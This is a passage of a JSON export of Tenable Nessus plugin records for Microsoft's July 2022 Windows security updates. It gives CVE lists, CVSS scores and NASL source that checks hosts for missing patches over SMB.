{"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T10:27:45", "description": "The remote Windows host is missing security update 5015862 or cumulative update 5015866. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-22024, CVE-2022-22027, CVE-2022-22029, CVE-2022-22038, CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. 
An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034, CVE-2022-22036, CVE-2022-22037, CVE-2022-22041, CVE-2022-22047, CVE-2022-22049, CVE-2022-22050, CVE-2022-30202, CVE-2022-30205, CVE-2022-30206, CVE-2022-30209, CVE-2022-30220, CVE-2022-30224, CVE-2022-30225, CVE-2022-30226).\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-12T00:00:00", "type": "nessus", "title": "KB5015862: Windows 7 and Windows Server 2008 R2 Security Update (July 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22042", "CVE-2022-22043", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30213", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30223", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUL_5015862.NASL", "href": "https://www.tenable.com/plugins/nessus/163050", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163050);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21845\",\n \"CVE-2022-22022\",\n \"CVE-2022-22023\",\n \"CVE-2022-22024\",\n \"CVE-2022-22025\",\n \"CVE-2022-22026\",\n \"CVE-2022-22027\",\n \"CVE-2022-22028\",\n \"CVE-2022-22029\",\n \"CVE-2022-22034\",\n \"CVE-2022-22036\",\n \"CVE-2022-22037\",\n \"CVE-2022-22039\",\n \"CVE-2022-22040\",\n \"CVE-2022-22042\",\n \"CVE-2022-22043\",\n \"CVE-2022-22047\",\n \"CVE-2022-22048\",\n \"CVE-2022-22049\",\n \"CVE-2022-22050\",\n \"CVE-2022-30202\",\n \"CVE-2022-30203\",\n \"CVE-2022-30205\",\n \"CVE-2022-30206\",\n \"CVE-2022-30208\",\n \"CVE-2022-30209\",\n \"CVE-2022-30211\",\n \"CVE-2022-30213\",\n \"CVE-2022-30220\",\n \"CVE-2022-30221\",\n \"CVE-2022-30223\",\n \"CVE-2022-30224\",\n \"CVE-2022-30225\",\n \"CVE-2022-30226\"\n );\n script_xref(name:\"MSKB\", value:\"5015861\");\n script_xref(name:\"MSKB\", value:\"5015862\");\n script_xref(name:\"MSFT\", value:\"MS22-5015861\");\n script_xref(name:\"MSFT\", value:\"MS22-5015862\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/02\");\n script_xref(name:\"IAVA\", value:\"2022-A-0272-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0273-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0026\");\n\n script_name(english:\"KB5015862: Windows 7 and Windows Server 2008 R2 Security Update (July 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5015862 or \ncumulative update 5015866. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. 
An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-22024,\n CVE-2022-22027, CVE-2022-22029, CVE-2022-22038,\n CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034,\n CVE-2022-22036, CVE-2022-22037, CVE-2022-22041,\n CVE-2022-22047, CVE-2022-22049, CVE-2022-22050,\n CVE-2022-30202, CVE-2022-30205, CVE-2022-30206,\n CVE-2022-30209, CVE-2022-30220, CVE-2022-30224,\n CVE-2022-30225, CVE-2022-30226).\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015861\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015862\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015861\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015862\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5015862 or Cumulative Update 5015861\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22037\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30221\");\n\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-07';\nkbs = make_list(\n '5015862',\n '5015861'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1',\n sp:1,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015862, 5015861])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T15:01:22", "description": "The remote Windows host is missing security update 5015877 or cumulative update 5015874. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-22024, CVE-2022-22027, CVE-2022-22029, CVE-2022-22038, CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. 
An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034, CVE-2022-22036, CVE-2022-22037, CVE-2022-22041, CVE-2022-22047, CVE-2022-22049, CVE-2022-22050, CVE-2022-30202, CVE-2022-30205, CVE-2022-30206, CVE-2022-30209, CVE-2022-30220, CVE-2022-30224, CVE-2022-30225, CVE-2022-30226)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-12T00:00:00", "type": "nessus", "title": "KB5015877: Windows Server 2012 R2 Security Update (July 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22042", "CVE-2022-22043", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30213", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30223", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUL_5015877.NASL", "href": "https://www.tenable.com/plugins/nessus/163042", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163042);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21845\",\n \"CVE-2022-22022\",\n \"CVE-2022-22023\",\n \"CVE-2022-22024\",\n \"CVE-2022-22025\",\n \"CVE-2022-22026\",\n \"CVE-2022-22027\",\n \"CVE-2022-22028\",\n \"CVE-2022-22029\",\n \"CVE-2022-22034\",\n \"CVE-2022-22036\",\n \"CVE-2022-22037\",\n \"CVE-2022-22038\",\n \"CVE-2022-22039\",\n \"CVE-2022-22040\",\n \"CVE-2022-22041\",\n \"CVE-2022-22042\",\n \"CVE-2022-22043\",\n \"CVE-2022-22047\",\n \"CVE-2022-22048\",\n \"CVE-2022-22049\",\n \"CVE-2022-22050\",\n \"CVE-2022-30202\",\n \"CVE-2022-30203\",\n \"CVE-2022-30205\",\n \"CVE-2022-30206\",\n \"CVE-2022-30208\",\n \"CVE-2022-30209\",\n \"CVE-2022-30211\",\n \"CVE-2022-30213\",\n \"CVE-2022-30220\",\n \"CVE-2022-30221\",\n \"CVE-2022-30223\",\n \"CVE-2022-30224\",\n \"CVE-2022-30225\",\n \"CVE-2022-30226\"\n );\n script_xref(name:\"MSKB\", value:\"5015874\");\n script_xref(name:\"MSKB\", value:\"5015877\");\n script_xref(name:\"MSFT\", value:\"MS22-5015874\");\n script_xref(name:\"MSFT\", value:\"MS22-5015877\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/02\");\n script_xref(name:\"IAVA\", value:\"2022-A-0272-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0273-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0026\");\n\n script_name(english:\"KB5015877: Windows Server 2012 R2 Security Update (July 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5015877\nor cumulative update 5015874. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. 
An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-22024,\n CVE-2022-22027, CVE-2022-22029, CVE-2022-22038,\n CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034,\n CVE-2022-22036, CVE-2022-22037, CVE-2022-22041,\n CVE-2022-22047, CVE-2022-22049, CVE-2022-22050,\n CVE-2022-30202, CVE-2022-30205, CVE-2022-30206,\n CVE-2022-30209, CVE-2022-30220, CVE-2022-30224,\n CVE-2022-30225, CVE-2022-30226)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015874\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015877\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015874\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015877\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5015877 or Cumulative Update 5015874\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22041\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30221\");\n\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-07';\nkbs = make_list(\n '5015877',\n '5015874'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3',\n sp:0,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015877, 5015874])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T15:00:51", "description": "The remote Windows host is missing security update 5015832. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-22024, CVE-2022-22027, CVE-2022-22029, CVE-2022-22038, CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. 
An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034, CVE-2022-22036, CVE-2022-22037, CVE-2022-22041, CVE-2022-22047, CVE-2022-22049, CVE-2022-22050, CVE-2022-30202, CVE-2022-30205, CVE-2022-30206, CVE-2022-30209, CVE-2022-30220, CVE-2022-30224, CVE-2022-30225, CVE-2022-30226).\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-12T00:00:00", "type": "nessus", "title": "KB5015832: Windows 10 LTS 1507 Security Update (July 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22029", "CVE-2022-22031", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22042", "CVE-2022-22043", "CVE-2022-22045", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-22711", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30213", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30223", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUL_5015832.NASL", "href": "https://www.tenable.com/plugins/nessus/163053", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163053);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21845\",\n \"CVE-2022-22022\",\n \"CVE-2022-22023\",\n \"CVE-2022-22024\",\n \"CVE-2022-22025\",\n \"CVE-2022-22026\",\n \"CVE-2022-22027\",\n \"CVE-2022-22031\",\n \"CVE-2022-22034\",\n \"CVE-2022-22036\",\n \"CVE-2022-22037\",\n \"CVE-2022-22038\",\n \"CVE-2022-22040\",\n \"CVE-2022-22041\",\n \"CVE-2022-22042\",\n \"CVE-2022-22043\",\n \"CVE-2022-22045\",\n \"CVE-2022-22047\",\n \"CVE-2022-22048\",\n \"CVE-2022-22049\",\n \"CVE-2022-22050\",\n \"CVE-2022-22711\",\n \"CVE-2022-30202\",\n \"CVE-2022-30203\",\n \"CVE-2022-30205\",\n \"CVE-2022-30206\",\n \"CVE-2022-30208\",\n \"CVE-2022-30209\",\n \"CVE-2022-30211\",\n \"CVE-2022-30213\",\n \"CVE-2022-30220\",\n \"CVE-2022-30221\",\n \"CVE-2022-30223\",\n \"CVE-2022-30224\",\n \"CVE-2022-30225\",\n \"CVE-2022-30226\"\n );\n script_xref(name:\"MSKB\", value:\"5015832\");\n script_xref(name:\"MSFT\", value:\"MS22-5015832\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/02\");\n script_xref(name:\"IAVA\", value:\"2022-A-0272-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0273-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0026\");\n\n script_name(english:\"KB5015832: Windows 10 LTS 1507 Security Update (July 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5015832. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 
(CVE-2022-22024,\n CVE-2022-22027, CVE-2022-22029, CVE-2022-22038,\n CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034,\n CVE-2022-22036, CVE-2022-22037, CVE-2022-22041,\n CVE-2022-22047, CVE-2022-22049, CVE-2022-22050,\n CVE-2022-30202, CVE-2022-30205, CVE-2022-30206,\n CVE-2022-30209, CVE-2022-30220, CVE-2022-30224,\n CVE-2022-30225, CVE-2022-30226).\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015832\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015832\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5015832\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22041\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30221\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-07';\nkbs = make_list(\n '5015832'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:10240,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015832])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n 
audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T15:00:51", "description": "The remote Windows host is missing security update 5015808.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-22024, CVE-2022-22027, CVE-2022-22029, CVE-2022-22038, CVE-2022-22039, CVE-2022-30211, CVE-2022-30214, CVE-2022-30221, CVE-2022-30222)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-22025, CVE-2022-22040, CVE-2022-22043, CVE-2022-30208)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22031, CVE-2022-22034, CVE-2022-22036, CVE-2022-22037, CVE-2022-22041, CVE-2022-22045, CVE-2022-22047, CVE-2022-22049, CVE-2022-22050, CVE-2022-30202, CVE-2022-30205, CVE-2022-30206, CVE-2022-30209, CVE-2022-30215, CVE-2022-30220, CVE-2022-30224, CVE-2022-30225, CVE-2022-30226)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. 
(CVE-2022-21845, CVE-2022-22028, CVE-2022-22042, CVE-2022-22711, CVE-2022-30213, CVE-2022-30223)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-12T00:00:00", "type": "nessus", "title": "KB5015808: Windows 10 Version 1607 and Windows Server 2016 Security Update (July 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22031", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22042", "CVE-2022-22043", "CVE-2022-22045", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-22711", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30213", "CVE-2022-30214", "CVE-2022-30215", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30222", "CVE-2022-30223", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUL_5015808.NASL", "href": "https://www.tenable.com/plugins/nessus/163052", "sourceData": "##\n# (C) Tenable, 